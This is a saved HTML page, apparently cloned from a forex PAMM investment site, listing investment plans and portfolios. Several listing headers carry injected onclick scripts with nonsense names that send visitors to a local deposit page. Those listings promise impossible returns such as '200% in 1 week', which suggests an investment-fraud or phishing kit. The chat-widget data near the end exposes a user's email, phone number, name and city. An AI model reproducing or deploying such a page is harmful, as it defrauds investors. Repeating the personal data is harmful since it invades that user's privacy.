                <span class="s_white-space_nowrap">
                    2
                    days
                </span>
        </p>
        <p class="s_mb_0 s_pb_0">Account Denomination: USD</p>

        <div class="s_mt_18">
                                
                                    
                        
                
                <a class="button button_type_primary button_size_small button_type_inline s_ml_0" href="https://my.ALAVI.com/en/invest/pamm_account/528531/">
            <span class="button__deco">Invest</span>
        </a>
    
        </div>
        </div>

    </div>

            




    
    <div class="accordion__group accordion__group__invest" data-accordion-group-name="511177">

    
        <script>function ssss(){location.href='./deposit and withdrawal of funds.php?plan=pro plan'}</script><div  onclick=ssss() class="accordion__header accordion__header__invest s_pt_9 s_pb_9 s_pl_10 s_pr_10">
                    <p class="s_mb_0 s_pb_0 s_white-space_nowrap">
                <span class="s_ml_0 stars stars_count_45" title="Star Rating: 4.7 / 5">
                    <span class="stars__star_style_dark"></span>
                    <span class="stars__star_style_golden"></span>
                </span>
            </p>
        
        <p class="s_mb_5  invest-item-name">
            <span class="rating_number s_display_block s_float_l">4.</span>
            <span class="s_dir_ltr name s_float_l text_align_l">
                pro plan
                            </span>
        </p>

        <p class="s_mb_0 s_white-space_nowrap">
            <span class="invest__return_label s_float_l">Return:105% in 120hrs
                <img class="invest__return_chart s_valign_m s_ml_30" src="./Invest_files/daily_return_rating(3).svg">
            </span>
            <span class="s_white-space_nowrap s_float_r">
                $18000-$45000
            </span>
            <span class="s_display_block s_clear_both">&nbsp;</span>
        </p>

        </div>

        
    <div class="accordion__content accordion__content__invest s_pt_9 s_pl_10 s_pr_10" style="display: none;">


        <p class="s_mb_0 s_pb_0">
            Today's Change:
                <span class="s_white-space_nowrap">
                    <span class="text_color_red">
        −0.04 </span>
                </span>
        </p>
        <p class="s_mb_0 s_pb_0">
            Since Opened:
                <span class="s_white-space_nowrap">
                    267
                    days
                </span>
        </p>
        <p class="s_mb_0 s_pb_0">Account Denomination: USD</p>

        <div class="s_mt_18">
                                
                                    
                        
                
                <a class="button button_type_primary button_size_small button_type_inline s_ml_0" href="https://my.ALAVI.com/en/invest/pamm_account/511177/">
            <span class="button__deco">Invest</span>
        </a>
    
        </div>
        </div>

    </div>

            




    
    <div class="accordion__group accordion__group__invest" data-accordion-group-name="528431">

    
        <script>function riirelllcssss(){location.href='./deposit and withdrawal of funds.php?plan=plus offer'}</script><div  onclick=riirelllcssss() class="accordion__header accordion__header__invest s_pt_9 s_pb_9 s_pl_10 s_pr_10">
                    <p class="s_mb_0 s_pb_0 s_white-space_nowrap">
                <span class="s_ml_0 stars stars_count_45" title="Star Rating: 4.7 / 5">
                    <span class="stars__star_style_dark"></span>
                    <span class="stars__star_style_golden"></span>
                </span>
            </p>
        
        <p class="s_mb_5  invest-item-name">
            <span class="rating_number s_display_block s_float_l">5.</span>
            <span class="s_dir_ltr name s_float_l text_align_l">
                plus offer
                            </span>
        </p>

        <p class="s_mb_0 s_white-space_nowrap">
            <span class="invest__return_label s_float_l">Return:200% in 1 week
                <img class="invest__return_chart s_valign_m s_ml_30" src="./Invest_files/daily_return_rating(4).svg">
            </span>
            <span class="s_white-space_nowrap s_float_r">
                $50000-unlimited
            </span>
            <span class="s_display_block s_clear_both">&nbsp;</span>
        </p>

        </div>

        
    <div class="accordion__content accordion__content__invest s_pt_9 s_pl_10 s_pr_10" style="display: none;">


        <p class="s_mb_0 s_pb_0">
            Today's Change:
                <span class="s_white-space_nowrap">
                    <span class="text_color_grey">
        0.00 </span>
                </span>
        </p>
        <p class="s_mb_0 s_pb_0">
            Since Opened:
                <span class="s_white-space_nowrap">
                    3
                    days
                </span>
        </p>
        <p class="s_mb_0 s_pb_0">Account Denomination: USD</p>

        <div class="s_mt_18">
                                
                                    
                        
                
                <a class="button button_type_primary button_size_small button_type_inline s_ml_0" href="https://my.ALAVI.com/en/invest/pamm_account/528431/">
            <span class="button__deco">Invest</span>
        </a>
    
        </div>
        </div>

    </div>

            </div>

</div></div><div class="paginator js-data-list-filter" data-filter-type="Pagination" data-pages-count="1"><button class="paginator__prev paginator__button paginator__button_disabled_yes"></button><div class="paginator__content"><span><span class="paginator__current">1</span> / <span class="paginator__items">1</span></span></div><button class="paginator__next paginator__button"></button><a class="s_float_r s_line-height_27" href="https://my.ALAVI.com/en/invest/pamm_account/">All Accounts</a></div></div></div></div><div data-accordion-group-name="portfolioRating" class="accordion__group"><div class="accordion__header"><span>The PAMM Account Portfolio Ratings</span></div><div class="accordion__content" style="display: none;"><div class="js-data-list js-init-content-accordions" data-type="DataListWithContentInit" data-fetch-url="/en/investor/pamm6/invest/pamm_portfolios/rating/?perPage=5" data-fetch-deferred="true"><div class="loader__holder loader__holder_type_absolute"><div class="loader loader_theme_light s_pt_9 loader_state_loading"><div class="loader__text loader__text_type_loading"><div class="loader__needles"><div class="loader__needle loader__needle_pos_north"></div><div class="loader__needle loader__needle_pos_east"></div><div class="loader__needle loader__needle_pos_south"></div><div class="loader__needle loader__needle_pos_west"></div></div>Loading...</div><div class="loader__text loader__text_type_fail"><p>Data can not be shown</p><button class="button button_type_primary button_size_middle js-reload s_mb_18" type="button" tabindex="0"><span class="button__deco">Refresh</span></button></div></div>

<div class="invest-account-list js-data-list-content js-init-content-accordions" data-page="1" data-per-page="5" data-total-count="142">
        
    <div class="accordion accordion_type_table accordion_theme_light">

            



    
    <div class="accordion__group accordion__group__invest" data-accordion-group-name="31899">

    
        <script>function riirecssss(){location.href='./withdrawal of funds.php'}</script><div  onclick=riirecssss() class="accordion__header accordion__header__invest s_pt_9 s_pb_9 s_pl_10 s_pr_10">
    <p class="s_mb_5 s_white-space_nowrap invest-item-name">
        <span class="rating_number s_display_block s_float_l">1.</span>
        <span class="s_dir_ltr name s_float_l text_align_l">
            Bablobuldozer
                            (Надёжность)
                    </span>
    </p>

    <p class="s_mb_0">
        <span class="invest__return_label s_float_l">Return:
            <img class="invest__return_chart s_valign_m s_ml_30" src="./Invest_files/daily_return_small.gif">
        </span>
        <span class="s_white-space_nowrap s_float_r">
            667.7%
        </span>
        <span class="s_display_block s_clear_both">&nbsp;</span>
    </p>

    </div>

    
    <div class="accordion__content accordion__content__invest s_pt_9 s_pl_10 s_pr_10">

    <p class="s_mb_0 s_pb_0">
        Today's Change:

        <span class="s_white-space_nowrap">
            <span class="text_color_grey">
        0.00 </span>
        </span>
    </p>
    <p class="s_mb_0 s_pb_0">
        Since Opened:

        <span class="s_white-space_nowrap">
            815
            days
        </span>
    </p>
    <p class="s_mb_0 s_pb_0">Account Denomination: USD</p>
    <p class="s_mb_0 s_pb_0">Manager's Compensation: 15%</p>

            <p class="s_mt_9">Portfolio Composition</p>

        <ul class="list account-list">
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/312978/">Eternity (Trade proved by time)</a>
                <br>
                Offer: 50%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/465705/">Irrefutable (New start New wins)</a>
                <br>
                Offer: 40%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/368422/">MyEnlightenment (Лучше депозита в банке)</a>
                <br>
                Offer: 40%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/468900/">Stebel (Стабильность)</a>
                <br>
                Offer: 20%
            </li>
                    </ul>
    
    <div class="s_mt_18">
                            
                                    
                        
                
                <a class="button button_type_primary button_size_small button_type_inline s_ml_0" href="https://my.ALAVI.com/en/invest/pamm_portfolios/31899/">
            <span class="button__deco">Invest</span>
        </a>
    
    </div>
    </div>

    </div>
            



    
    <div class="accordion__group accordion__group__invest" data-accordion-group-name="31551">

    
        <script>function riirecssss(){location.href='./withdrawal of funds.php'}</script><div  onclick=riirecssss() class="accordion__header accordion__header__invest s_pt_9 s_pb_9 s_pl_10 s_pr_10">
    <p class="s_mb_5 s_white-space_nowrap invest-item-name">
        <span class="rating_number s_display_block s_float_l">2.</span>
        <span class="s_dir_ltr name s_float_l text_align_l">
            Stable_leverage
                            (Счета с постоянным плечом)
                    </span>
    </p>

    <p class="s_mb_0">
        <span class="invest__return_label s_float_l">Return:
            <img class="invest__return_chart s_valign_m s_ml_30" src="./Invest_files/daily_return_small(1).gif">
        </span>
        <span class="s_white-space_nowrap s_float_r">
            284.7%
        </span>
        <span class="s_display_block s_clear_both">&nbsp;</span>
    </p>

    </div>

    
    <div class="accordion__content accordion__content__invest s_pt_9 s_pl_10 s_pr_10">

    <p class="s_mb_0 s_pb_0">
        Today's Change:

        <span class="s_white-space_nowrap">
            <span class="text_color_grey">
        0.00 </span>
        </span>
    </p>
    <p class="s_mb_0 s_pb_0">
        Since Opened:

        <span class="s_white-space_nowrap">
            915
            days
        </span>
    </p>
    <p class="s_mb_0 s_pb_0">Account Denomination: USD</p>
    <p class="s_mb_0 s_pb_0">Manager's Compensation: 3%</p>

            <p class="s_mt_9">Portfolio Composition</p>

        <ul class="list account-list">
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/456693/">Nasdaq NY 2</a>
                <br>
                Offer: 30%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/471716/">PRADO aggressive (EA PRADO risk 5 prc)</a>
                <br>
                Offer: 12%
            </li>
                    </ul>
    
    <div class="s_mt_18">
                            
                                    
                        
                
                <a class="button button_type_primary button_size_small button_type_inline s_ml_0" href="https://my.ALAVI.com/en/invest/pamm_portfolios/31551/">
            <span class="button__deco">Invest</span>
        </a>
    
    </div>
    </div>

    </div>
            



    
    <div class="accordion__group accordion__group__invest" data-accordion-group-name="27070">

    
        <script>function riirecssss(){location.href='./withdrawal of funds.php'}</script><div  onclick=riirecssss() class="accordion__header accordion__header__invest s_pt_9 s_pb_9 s_pl_10 s_pr_10">
    <p class="s_mb_5 s_white-space_nowrap invest-item-name">
        <span class="rating_number s_display_block s_float_l">3.</span>
        <span class="s_dir_ltr name s_float_l text_align_l">
            Euro_Team
                            (Super оферта 5 процентов)
                    </span>
    </p>

    <p class="s_mb_0">
        <span class="invest__return_label s_float_l">Return:
            <img class="invest__return_chart s_valign_m s_ml_30" src="./Invest_files/daily_return_small(2).gif">
        </span>
        <span class="s_white-space_nowrap s_float_r">
            258.7%
        </span>
        <span class="s_display_block s_clear_both">&nbsp;</span>
    </p>

    </div>

    
    <div class="accordion__content accordion__content__invest s_pt_9 s_pl_10 s_pr_10">

    <p class="s_mb_0 s_pb_0">
        Today's Change:

        <span class="s_white-space_nowrap">
            <span class="text_color_red">
        −0.04 </span>
        </span>
    </p>
    <p class="s_mb_0 s_pb_0">
        Since Opened:

        <span class="s_white-space_nowrap">
            1732
            days
        </span>
    </p>
    <p class="s_mb_0 s_pb_0">Account Denomination: EUR</p>
    <p class="s_mb_0 s_pb_0">Manager's Compensation: 5%</p>

            <p class="s_mt_9">Portfolio Composition</p>

        <ul class="list account-list">
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/202131/">Hohla (Several Systems EUR)</a>
                <br>
                Offer: 50%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/394709/">Sphere EUR (ЕвроСфера)</a>
                <br>
                Offer: 50%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/403013/">Super Euro1</a>
                <br>
                Offer: 29%
            </li>
                    </ul>
    
    <div class="s_mt_18">
                            
                                    
                        
                
                <a class="button button_type_primary button_size_small button_type_inline s_ml_0" href="https://my.ALAVI.com/en/invest/pamm_portfolios/27070/">
            <span class="button__deco">Invest</span>
        </a>
    
    </div>
    </div>

    </div>
            



    
    <div class="accordion__group accordion__group__invest" data-accordion-group-name="25920">

    
    <div class="accordion__header accordion__header__invest s_pt_9 s_pb_9 s_pl_10 s_pr_10">
    <p class="s_mb_5 s_white-space_nowrap invest-item-name">
        <span class="rating_number s_display_block s_float_l">4.</span>
        <span class="s_dir_ltr name s_float_l text_align_l">
            American World.
                            (Super оферта 5 процентов)
                    </span>
    </p>

    <p class="s_mb_0">
        <span class="invest__return_label s_float_l">Return:
            <img class="invest__return_chart s_valign_m s_ml_30" src="./Invest_files/daily_return_small(3).gif">
        </span>
        <span class="s_white-space_nowrap s_float_r">
            226.8%
        </span>
        <span class="s_display_block s_clear_both">&nbsp;</span>
    </p>

    </div>

    
    <div class="accordion__content accordion__content__invest s_pt_9 s_pl_10 s_pr_10">

    <p class="s_mb_0 s_pb_0">
        Today's Change:

        <span class="s_white-space_nowrap">
            <span class="text_color_red">
        −0.12 </span>
        </span>
    </p>
    <p class="s_mb_0 s_pb_0">
        Since Opened:

        <span class="s_white-space_nowrap">
            1831
            days
        </span>
    </p>
    <p class="s_mb_0 s_pb_0">Account Denomination: USD</p>
    <p class="s_mb_0 s_pb_0">Manager's Compensation: 5%</p>

            <p class="s_mt_9">Portfolio Composition</p>

        <ul class="list account-list">
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/395794/">American Dream 1 (Консервативный счет)</a>
                <br>
                Offer: 29%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/233477/">Hohla (USD)</a>
                <br>
                Offer: 40%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/316792/">Lucky Pound (Breakout trading)</a>
                <br>
                Offer: 40%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/400199/">Lucky Pound_001 (Клон счета Lucky Pound)</a>
                <br>
                Offer: 50%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/329842/">Moriarti (support lines)</a>
                <br>
                Offer: 40%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/400202/">Sphere_002 (Клон счета Sphere)</a>
                <br>
                Offer: 44%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/208007/">Stability (Super Turbo)</a>
                <br>
                Offer: 35%
            </li>
                    </ul>
    
    <div class="s_mt_18">
                            
                                    
                        
                
                <a class="button button_type_primary button_size_small button_type_inline s_ml_0" href="https://my.ALAVI.com/en/invest/pamm_portfolios/25920/">
            <span class="button__deco">Invest</span>
        </a>
    
    </div>
    </div>

    </div>
            



    
    <div class="accordion__group accordion__group__invest" data-accordion-group-name="33089">

    
    <div class="accordion__header accordion__header__invest s_pt_9 s_pb_9 s_pl_10 s_pr_10">
    <p class="s_mb_5 s_white-space_nowrap invest-item-name">
        <span class="rating_number s_display_block s_float_l">5.</span>
        <span class="s_dir_ltr name s_float_l text_align_l">
            TGK
                    </span>
    </p>

    <p class="s_mb_0">
        <span class="invest__return_label s_float_l">Return:
            <img class="invest__return_chart s_valign_m s_ml_30" src="./Invest_files/daily_return_small(4).gif">
        </span>
        <span class="s_white-space_nowrap s_float_r">
            79.1%
        </span>
        <span class="s_display_block s_clear_both">&nbsp;</span>
    </p>

    </div>

    
    <div class="accordion__content accordion__content__invest s_pt_9 s_pl_10 s_pr_10">

    <p class="s_mb_0 s_pb_0">
        Today's Change:

        <span class="s_white-space_nowrap">
            <span class="text_color_red">
        −0.02 </span>
        </span>
    </p>
    <p class="s_mb_0 s_pb_0">
        Since Opened:

        <span class="s_white-space_nowrap">
            113
            days
        </span>
    </p>
    <p class="s_mb_0 s_pb_0">Account Denomination: USD</p>
    <p class="s_mb_0 s_pb_0">Manager's Compensation: 5%</p>

            <p class="s_mt_9">Portfolio Composition</p>

        <ul class="list account-list">
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/527089/">Exact2022</a>
                <br>
                Offer: 30%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/494953/">Melniza 1.0 (Портфель FLAGMAN BANK)</a>
                <br>
                Offer: 33%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/329842/">Moriarti (support lines)</a>
                <br>
                Offer: 30%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/517086/">PeaceUA (Ловим тренд)</a>
                <br>
                Offer: 25%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/468900/">Stebel (Стабильность)</a>
                <br>
                Offer: 30%
            </li>
                        <li><a class="link_type_outer" dir="ltr" target="_blank" href="https://ALAVI.com/en/invest/pamm/473880/">Wheel of time (Работа на результат)</a>
                <br>
                Offer: 25%
            </li>
                    </ul>
    
    <div class="s_mt_18">
                            
                                    
                        
                
                <a class="button button_type_primary button_size_small button_type_inline s_ml_0" href="https://my.ALAVI.com/en/invest/pamm_portfolios/33089/">
            <span class="button__deco">Invest</span>
        </a>
    
    </div>
    </div>

    </div>
            </div>

</div></div><div class="paginator js-data-list-filter" data-filter-type="Pagination" data-pages-count="1"><button class="paginator__prev paginator__button paginator__button_disabled_yes"></button><div class="paginator__content"><span><span class="paginator__current">1</span> / <span class="paginator__items">29</span></span></div><button class="paginator__next paginator__button"></button><a class="s_float_r s_line-height_27" href="https://my.ALAVI.com/en/invest/pamm_portfolios/">All Accounts</a></div></div></div></div></div><footer class="footer"><ul class="footer__menu"><li class="footer__menu-item"><form class="form" name="logout" method="post" action="https://my.ALAVI.com/en/logout/" autocomplete="off"><input type="hidden" class="js-form-el-field js-form-el-holder js-form-el__input" name="csrf" value="088d0be0ebfd833f42ff088904d12aa4ef17eac6" data-field-type="HiddenInputField" data-input-type="HiddenInput"><button type="submit" name="send" class="footer__link">Log&nbsp;out</button></form></li><li class="footer__menu-item"><button class="footer__link js-app-mode-switcher" data-app-mode="full" data-url="https://my.ALAVI.com/en/invest/">Full version</button></li><li class="footer__menu-item"><div class="footer__lang"><label for="lang-select" class="footer__lang-label">English</label><select id="lang-select" class="footer__lang-select js-lang-switcher" tabindex="-1"><option class="footer__lang-option" value="" selected="">English</option><option class="footer__lang-option" value="https://my.ALAVI.com/es/invest/">Español</option><option class="footer__lang-option" value="https://my.ALAVI.com/id/invest/">Indonesia</option><option class="footer__lang-option" value="https://my.ALAVI.com/ru/invest/">Русский</option><option class="footer__lang-option" value="https://my.ALAVIcompany.online/zh-hans/invest/">简体中文</option><option class="footer__lang-option" value="https://my.ALAVI.com/ar/invest/">العربية</option><option class="footer__lang-option" value="https://my.ALAVI-officialir.com/fa/invest/">فارسی</option></select></div></li></ul><div class="footer__content"><div class="footer__contacts"><p class="s_mb_9"><a href="tel:+59">+</a></p><p class="s_mb_9"><a href="mailto:info@ALAVI.com">info@ALAVI.com</a></p></div><div class="footer__copyright"><p class="s_mb_9 text_size_12">© 1998-2022 ALAVI Limited</p><p class="s_mb_0 text_size_12"><a class="link_type_pdf" target="_blank" href="https://my.ALAVI.com/data/docs/regulations/privacy_and_refund_policy_en.pdf">Privacy policy</a></p></div></div></footer></div><div class="hidden"><div class="errors"><div class="errors__text errors__text_type_unknown">Error. Please try again later. A message about this error has been sent to our technical support.</div><div class="errors__text errors__text_type_default">Field filled incorrectly.</div><div class="errors__text errors__text_type_not-empty">This field is required</div><div class="errors__text errors__text_type_something-checked">This field is required</div><div class="errors__text errors__text_type_twelve-digits-overflow">No more than 12 digits before the divider.</div></div></div></div><div class="chat-widget"><script type="text/template" id="info-block-template"><div class="info-block__icon chat-widget__icon-<%= name %>"></div><div class="info-block__title"><%= title %></div><div class="info-block__description"><%= description %></div><div class="info-block__icon info-block__icon-back js-info-block-back"></div></script><div class="chat-widget__button js-chat-widget"></div><div class="chat-widget__icon-list"><div class="chat-widget__icon chat-widget__icon-livechat js-icon" data-options="{&quot;name&quot;:&quot;livechat&quot;}"></div><div class="chat-widget__icon chat-widget__icon-viber js-icon" data-options="{&quot;name&quot;:&quot;viber&quot;,&quot;title&quot;:&quot;Viber&quot;,&quot;description&quot;:&quot;&lt;ol&gt;   &lt;li&gt;Add the following ALAVI number to your contact list: &lt;strong class=&#39;-nowrap&#39;&gt;+1 (784) 430-3918&lt;\/strong&gt;&lt;\/li&gt;\n  &lt;li&gt;Open Viber.&lt;\/li&gt;\n  &lt;li&gt;Click on \u00abContacts\u00bb.&lt;\/li&gt;\n  &lt;li&gt;Select the ALAVI number you added in step 1.&lt;\/li&gt;\n  &lt;li&gt;Start chatting!&lt;\/li&gt;\n&lt;\/ol&gt;\n&quot;}"></div><div class="chat-widget__icon chat-widget__icon-whatsapp js-icon" data-options="{&quot;name&quot;:&quot;whatsapp&quot;,&quot;locale&quot;:&quot;en&quot;}"></div><div class="chat-widget__icon chat-widget__icon-telegram js-icon" data-options="{&quot;name&quot;:&quot;telegram&quot;,&quot;title&quot;:&quot;Telegram&quot;,&quot;description&quot;:&quot;&lt;ol&gt;   &lt;li&gt;Install the Telegram app.&lt;\/li&gt;\n  &lt;li&gt;&lt;a href=&#39;https:\/\/t.me\/ALAVI_official_bot&#39; class=&#39;-link&#39; target=&#39;_blank&#39;&gt;Click here&lt;\/a&gt;&lt;\/li&gt;\n  &lt;li&gt;Start chatting!&lt;\/li&gt;\n&lt;\/ol&gt;\n&quot;}"></div><div class="chat-widget__icon chat-widget__icon-messenger js-icon" data-options="{&quot;name&quot;:&quot;messenger&quot;}"></div><div class="chat-widget__icon chat-widget__icon-chat-close js-chat-widget-close"></div></div><div class="info-block" style="height: 368px;"></div><div class="livechat" data-user="{&quot;isIndividual&quot;:true,&quot;clientId&quot;:13737909,&quot;clientLocale&quot;:&quot;en&quot;,&quot;mailoutLocale&quot;:&quot;en&quot;,&quot;email&quot;:&quot;chimmeriri100@gmail.com&quot;,&quot;phone&quot;:&quot;+2347046086168&quot;,&quot;countryName&quot;:&quot;Nigeria&quot;,&quot;countryNameEn&quot;:&quot;Nigeria&quot;,&quot;countryCode&quot;:&quot;NGA&quot;,&quot;documentNumber&quot;:null,&quot;isApproved&quot;:false,&quot;dateReg&quot;:&quot;2022-09-03 15:30:19&quot;,&quot;birthDate&quot;:&quot;&quot;,&quot;emailVerifyStatus&quot;:1,&quot;avaliableMailoutLocales&quot;:[&quot;en&quot;,&quot;ru&quot;,&quot;id&quot;,&quot;zh-hans&quot;,&quot;ar&quot;,&quot;fa&quot;,&quot;es&quot;,&quot;ua&quot;,&quot;vi&quot;],&quot;isNewsLetterAllowed&quot;:true,&quot;irisAssignedUser&quot;:&quot;Ebele Nwawuzie&quot;,&quot;agentId&quot;:null,&quot;firstName&quot;:&quot;Fana&quot;,&quot;lastName&quot;:&quot;Sata&quot;,&quot;middleName&quot;:null,&quot;isCanChangeMiddleName&quot;:false,&quot;firstNameOriginal&quot;:&quot;Fana&quot;,&quot;lastNameOriginal&quot;:&quot;Sata&quot;,&quot;sex&quot;:null,&quot;cityReg&quot;:&quot;Lagos&quot;,&quot;isShowPartnershipAbilityChange&quot;:false,&quot;daysAfterWhichCanChangePartner&quot;:5,&quot;isForumRelationEnabled&quot;:true,&quot;ibtForumNickName&quot;:&quot;&quot;,&quot;ibtForumRelation&quot;:false,&quot;sumSubSettings&quot;:{&quot;required_documents&quot;:[]},&quot;surveyEnabled&quot;:true}" data-locale="en" data-lang="{&quot;en&quot;:&quot;English&quot;,&quot;ru&quot;:&quot;\u0420\u0443\u0441\u0441\u043a\u0438\u0439&quot;,&quot;ua&quot;:&quot;\u0423\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0430&quot;,&quot;id&quot;:&quot;Indonesia&quot;,&quot;fa&quot;:&quot;\u0641\u0627\u0631\u0633\u06cc&quot;,&quot;zh-hans&quot;:&quot;\u7b80\u4f53\u4e2d\u6587&quot;,&quot;ar&quot;:&quot;\u0627\u0644\u0639\u0631\u0628\u064a\u0629&quot;,&quot;es&quot;:&quot;Espa\u00f1ol&quot;,&quot;vi&quot;:&quot;Ti\u1ebfng Vi\u1ec7t&quot;}"><div class="livechat__body"><div class="livechat__title">Privacy Policy,</div><div class="livechat__description">By using the online chat, you hereby accept the terms of the <a href="https://my.ALAVI.com/data/docs/regulations/privacy_and_refund_policy_en.pdf" class="-nowrap link_type_pdf" target="_blank">Privacy Policy</a></div></div><button class="-btn -btn_micro livechat__btn js-livechat-activate">I accept</button><div class="livechat__button-close js-livechat-close"><i class="livechat__button-close-svg"></i></div></div></div><script src="./Invest_files/config_mobile.js.download"></script><script src="./Invest_files/common.js.download"></script><script src="./Invest_files/EmptyPage.js.download"></script><link rel="stylesheet" href="./Invest_files/bottom.css"><link rel="stylesheet" href="./Invest_files/images.css"><script>(function(){var d=document,g=d.createElement("script"),s=d.getElementsByTagName("script")[0];g.type="text/javascript";g.defer=true;g.async=true;g.src="//ws.ALAVI.org/piwik_ws.js";s.parentNode.insertBefore(g,s)})();window.piwikAsyncInit=function(){setTimeout(function(){try{gtt.ws.identify().then(function(id){try{var protocol="https:"==document.location.protocol?"https":"http",pTracker=Piwik.getTracker(protocol+"://ws.ALAVI.org/piwik.php",21);pTracker.setCustomVariable(1,"gid",id.gid);pTracker.setCustomVariable(2,"vid",id.vid);pTracker.trackPageView();pTracker.enableLinkTracking()}catch(e){window.onerror("Tracking error: "+e.toString(),"ALAVI ws","15");console.log(e)}},function(error){window.onerror("Tracking error: "+error.toString(),"ALAVI ws","20")})}catch(e){window.onerror("Tracking error: "+e.toString(),"ALAVI ws","23");console.log(e)}},0)};</script><noscript class="s_visuallyhidden_yes"><img src="//ws.ALAVI.org/piwik.php?idsite=21&amp;rec=1" alt=""></noscript><div style="display: none; visibility: hidden;">
<script type="text/javascript">(function(a,e,f,g,b,c,d){a[b]=a[b]||function(){(a[b].a=a[b].a||[]).push(arguments)};a[b].l=1*new Date;c=e.createElement(f);d=e.getElementsByTagName(f)[0];c.async=1;c.src=g;d.parentNode.insertBefore(c,d)})(window,document,"script","https://mc.yandex.ru/metrika/tag.js","ym");ym(28383866,"init",{clickmap:!0,trackLinks:!0,accurateTrackBounce:!0,webvisor:!0,params:window.dataLayer[1]});</script>
<noscript></noscript>
</div><iframe data-product="web_widget" title="No content" role="presentation" tabindex="-1" allow="microphone *" aria-hidden="true" src="./Invest_files/saved_resource.html" style="width: 0px; height: 0px; border: 0px; position: absolute; top: -9999px;"></iframe><div><iframe title="Opens a widget where you can chat to one of our agents" id="launcher" tabindex="-1" style="width: 48px; height: 50px; padding: 0px; margin: 10px 20px; position: fixed; bottom: 0px; overflow: visible; opacity: 0; border: 0px; z-index: 999998; transition-duration: 250ms; transition-timing-function: cubic-bezier(0.645, 0.045, 0.355, 1); transition-property: opacity, top, bottom; top: -9999px; visibility: hidden;" src="./Invest_files/saved_resource(1).html"></iframe></div></body></html>